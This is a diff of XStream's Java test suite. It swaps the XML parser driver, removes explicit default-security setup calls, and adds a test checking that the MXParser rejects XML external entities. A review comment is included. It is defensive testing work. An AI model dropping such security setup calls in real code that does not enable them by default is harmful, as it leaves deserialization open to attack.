@@ -34,7 +34,7 @@ public class BinaryStreamTest extends AbstractXMLReaderTest { protected HierarchicalStreamReader createReader(String xml) throws Exception { // Transmogrify XML input into binary format. HierarchicalStreamReader xmlReader = - new Xpp3Driver().createReader(new StringReader(xml)); + new MXParserDriver().createReader(new StringReader(xml)); ByteArrayOutputStream buffer = new ByteArrayOutputStream(); HierarchicalStreamWriter binaryWriter = new BinaryStreamWriter(buffer); diff --git a/xstream/src/test/com/thoughtworks/xstream/io/copy/HierarchicalStreamCopierTest.java b/xstream/src/test/com/thoughtworks/xstream/io/copy/HierarchicalStreamCopierTest.java index 9f65b80ad127f17c68dd82206390f7a0c2911483..3b94d7cbd8891802a52c290019488af26780ba97 100644 --- a/xstream/src/test/com/thoughtworks/xstream/io/copy/HierarchicalStreamCopierTest.java +++ b/xstream/src/test/com/thoughtworks/xstream/io/copy/HierarchicalStreamCopierTest.java @@ -1,6 +1,6 @@ /* * Copyright (C) 2006 Joe Walnes. - * Copyright (C) 2006, 2007, 2011, 2015, 2016 XStream Committers. + * Copyright (C) 2006, 2007, 2011, 2015, 2016, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD @@ -16,7 +16,7 @@ import com.thoughtworks.xstream.io.HierarchicalStreamReader; import com.thoughtworks.xstream.io.HierarchicalStreamWriter; import com.thoughtworks.xstream.io.xml.AbstractXMLReaderTest; import com.thoughtworks.xstream.io.xml.CompactWriter; -import com.thoughtworks.xstream.io.xml.Xpp3Driver; +import com.thoughtworks.xstream.io.xml.MXParserDriver; import com.thoughtworks.xstream.io.xml.XppReader; import com.thoughtworks.xstream.io.xml.xppdom.XppFactory; 
@@ -35,7 +35,7 @@ public class HierarchicalStreamCopierTest extends AbstractXMLReaderTest { // factory method - overriding base class. protected HierarchicalStreamReader createReader(String xml) throws Exception { HierarchicalStreamReader sourceReader = - new Xpp3Driver().createReader(new StringReader(xml)); + new MXParserDriver().createReader(new StringReader(xml)); StringWriter buffer = new StringWriter(); HierarchicalStreamWriter destinationWriter = new CompactWriter(buffer); diff --git a/xstream/src/test/com/thoughtworks/xstream/io/json/JettisonMappedXmlDriverTest.java b/xstream/src/test/com/thoughtworks/xstream/io/json/JettisonMappedXmlDriverTest.java index 03164bf069631534f5332650fae2ccddb87e55e8..4a1e566ef03910d94d723a4bee64c57ebb301510 100644 --- a/xstream/src/test/com/thoughtworks/xstream/io/json/JettisonMappedXmlDriverTest.java +++ b/xstream/src/test/com/thoughtworks/xstream/io/json/JettisonMappedXmlDriverTest.java @@ -1,5 +1,5 @@ /* - * Copyright (C) 2007, 2008, 2009, 2010, 2011, 2013, 2016, 2017, 2018 XStream Committers. + * Copyright (C) 2007, 2008, 2009, 2010, 2011, 2013, 2016, 2017, 2018, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD @@ -58,7 +58,6 @@ public class JettisonMappedXmlDriverTest extends TestCase { super.setUp(); TimeZoneChanger.change("UTC"); xstream = new XStream(new JettisonMappedXmlDriver()); - XStream.setupDefaultSecurity(xstream); xstream.allowTypesByWildcard(new String[]{ getClass().getName() + "$*", "com.thoughtworks.acceptance.objects.*"}); xstream.alias("category", Category.class); 
@@ -94,7 +93,6 @@ public class JettisonMappedXmlDriverTest extends TestCase {
 Configuration config = new Configuration();
 setTypeConverter.invoke(config, new Object[]{typeConverter});
 xstream = new XStream(new JettisonMappedXmlDriver(config));
- XStream.setupDefaultSecurity(xstream);
 xstream.allowTypesByWildcard(new String[]{"com.thoughtworks.acceptance.objects.*"});
 xstream.alias("product", Product.class);
 Product product = new Product("Banana", "123", 23.00);
diff --git a/xstream/src/test/com/thoughtworks/xstream/io/xml/JDom2AcceptanceTest.java b/xstream/src/test/com/thoughtworks/xstream/io/xml/JDom2AcceptanceTest.java
index 75845830ffc0759eb63b9d0c8a6e675d5cba54a5..16384eae56fb1905a97e53dff495814a71c27919 100644
--- a/xstream/src/test/com/thoughtworks/xstream/io/xml/JDom2AcceptanceTest.java
+++ b/xstream/src/test/com/thoughtworks/xstream/io/xml/JDom2AcceptanceTest.java
@@ -1,5 +1,5 @@
 /*
- * Copyright (C) 2013, 2017 XStream Committers.
+ * Copyright (C) 2013, 2017, 2021 XStream Committers.
  * All rights reserved.
  *
  * The software in this package is published under the terms of the BSD
@@ -31,7 +31,6 @@ public class JDom2AcceptanceTest extends TestCase {
 protected void setUp() throws Exception {
 super.setUp();
 xstream = new XStream();
- XStream.setupDefaultSecurity(xstream);
 xstream.allowTypesByWildcard(new String[] {"com.thoughtworks.acceptance.someobjects.*"});
 xstream.alias("x", X.class);
 }
diff --git a/xstream/src/test/com/thoughtworks/xstream/io/xml/JDomAcceptanceTest.java b/xstream/src/test/com/thoughtworks/xstream/io/xml/JDomAcceptanceTest.java
index e29274982d8d6560f1ca80ecff7a80753ec198e2..11d32462fc29d52fb69fb9877e85646ca18d7c84 100644
--- a/xstream/src/test/com/thoughtworks/xstream/io/xml/JDomAcceptanceTest.java
+++ b/xstream/src/test/com/thoughtworks/xstream/io/xml/JDomAcceptanceTest.java
@@ -1,6 +1,6 @@
 /*
  * Copyright (C) 2004 Joe Walnes.
- * Copyright (C) 2006, 2007, 2017 XStream Committers.
+ * Copyright (C) 2006, 2007, 2017, 2021 XStream Committers.
  * All rights reserved.
  *
  * The software in this package is published under the terms of the BSD
@@ -32,7 +32,6 @@ public class JDomAcceptanceTest extends TestCase {
 protected void setUp() throws Exception {
 super.setUp();
 xstream = new XStream();
- XStream.setupDefaultSecurity(xstream);
 xstream.allowTypesByWildcard(new String[] {"com.thoughtworks.acceptance.someobjects.*"});
 xstream.alias("x", X.class);
 }
diff --git a/xstream/src/test/com/thoughtworks/xstream/io/xml/MXParserReaderTest.java b/xstream/src/test/com/thoughtworks/xstream/io/xml/MXParserReaderTest.java
new file mode 100644
index 0000000000000000000000000000000000000000..1f071068b6b62bdccb44265ce6a07b9182fd1f5b
--- /dev/null
+++ b/xstream/src/test/com/thoughtworks/xstream/io/xml/MXParserReaderTest.java
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2021 XStream Committers.
+ * All rights reserved.
+ *
+ * The software in this package is published under the terms of the BSD
+ * style license a copy of which has been included with this distribution in
+ * the LICENSE.txt file.
+ *
+ * Created on 2. January 2021 by Joerg Schaible
+ */
+package com.thoughtworks.xstream.io.xml;
+
+import com.thoughtworks.xstream.XStreamException;
+import com.thoughtworks.xstream.io.HierarchicalStreamDriver;
+import com.thoughtworks.xstream.io.HierarchicalStreamReader;
+
+import java.io.StringReader;
+
+public class MXParserReaderTest extends AbstractXMLReaderTest {
+
+ private HierarchicalStreamDriver driver = new MXParserDriver();
+
+ // factory method
+ protected HierarchicalStreamReader createReader(String xml) throws Exception {
+ return driver.createReader(new StringReader(xml));
+ }
+
+ public void testIsXXEVulnerableWithExternalGeneralEntity() throws Exception {
+ try {
+ super.testIsXXEVulnerableWithExternalGeneralEntity();
+ fail("Thrown " + XStreamException.class.getName() + " expected");
+ } catch (final XStreamException e) {
+ final String message = e.getCause().getMessage();
+ if (message.indexOf("resolve entity") < 0) {
+ throw e;
+ }
+ }
+ }
+
+ // inherits tests from superclass
+}
diff --git a/xstream/src/test/com/thoughtworks/xstream/io/xml/StaxDriverTest.java b/xstream/src/test/com/thoughtworks/xstream/io/xml/StaxDriverTest.java
index a80335c70869f138394c8441b64adb8273470c54..51e3b9935da619fd16277756245ad87765eb54d2 100644
--- a/xstream/src/test/com/thoughtworks/xstream/io/xml/StaxDriverTest.java
+++ b/xstream/src/test/com/thoughtworks/xstream/io/xml/StaxDriverTest.java
@@ -1,5 +1,5 @@
 /*
- * Copyright (C) 2006, 2007, 2017 XStream Committers.
+ * Copyright (C) 2006, 2007, 2017, 2021 XStream Committers.
  * All rights reserved.
  *
  * The software in this package is published under the terms of the BSD
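Review bot: `final String message = e.getCause().getMessage();` in the catch block of `testIsXXEVulnerableWithExternalGeneralEntity` dereferences the cause without a null check, so an `XStreamException` raised without a cause, or with a cause whose message is null, turns the XXE assertion into a `NullPointerException` in the next line and hides the real failure. Guarding both keeps the original exception as the diagnostic: `final Throwable cause = e.getCause();` / `final String message = cause == null ? e.getMessage() : cause.getMessage();` / `if (message == null || message.indexOf("resolve entity") < 0) {`. The override would also read better with a comment stating its intent, e.g. `// MXParser must refuse to resolve the external general entity; any other failure is propagated`, since the method name inherited from the superclass suggests the opposite of what is being asserted. The `driver` field is never reassigned and can be `final`.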
@@ -51,7 +51,6 @@ public class StaxDriverTest extends AbstractAcceptanceTest { System.setProperty(XMLOutputFactory.class.getName(), XMLOutputFactoryBase.class.getName()); final MyStaxDriver driver = new MyStaxDriver(); xstream = new XStream(driver); - XStream.setupDefaultSecurity(xstream); assertBothWays("Hi", "<?xml version='1.0' encoding='utf-8'?><string>Hi</string>"); assertTrue(driver.createStaxReaderCalled); assertTrue(driver.createStaxWriterCalled); diff --git a/xstream/src/test/com/thoughtworks/xstream/persistence/FilePersistenceStrategyTest.java b/xstream/src/test/com/thoughtworks/xstream/persistence/FilePersistenceStrategyTest.java index dda77606d9330f94bed8478734d4714f3b885dd5..1604df88a4bf4694e110c20ad68e0e0c218eda29 100644 --- a/xstream/src/test/com/thoughtworks/xstream/persistence/FilePersistenceStrategyTest.java +++ b/xstream/src/test/com/thoughtworks/xstream/persistence/FilePersistenceStrategyTest.java @@ -1,5 +1,5 @@ /* - * Copyright (C) 2008, 2009, 2017 XStream Committers. + * Copyright (C) 2008, 2009, 2017, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD @@ -61,7 +61,6 @@ public class FilePersistenceStrategyTest extends TestCase { private XStream createXStream() { XStream xstream = new XStream(new DomDriver()); - XStream.setupDefaultSecurity(xstream); return xstream; } diff --git a/xstream/src/test/com/thoughtworks/xstream/persistence/FileStreamStrategyTest.java b/xstream/src/test/com/thoughtworks/xstream/persistence/FileStreamStrategyTest.java index 30fc916cb169dd111da12171d0a8b7d46b42174c..01f51723d2ea7fa68dd863b924d1e79866d05eab 100644 --- a/xstream/src/test/com/thoughtworks/xstream/persistence/FileStreamStrategyTest.java +++ b/xstream/src/test/com/thoughtworks/xstream/persistence/FileStreamStrategyTest.java 
@@ -1,6 +1,6 @@ /* * Copyright (C) 2006 Joe Walnes. - * Copyright (C) 2007, 2008, 2009, 2017 XStream Committers. + * Copyright (C) 2007, 2008, 2009, 2017, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD @@ -59,7 +59,6 @@ public class FileStreamStrategyTest extends TestCase { private XStream createXStream() { XStream xstream = new XStream(new DomDriver()); - XStream.setupDefaultSecurity(xstream); return xstream; }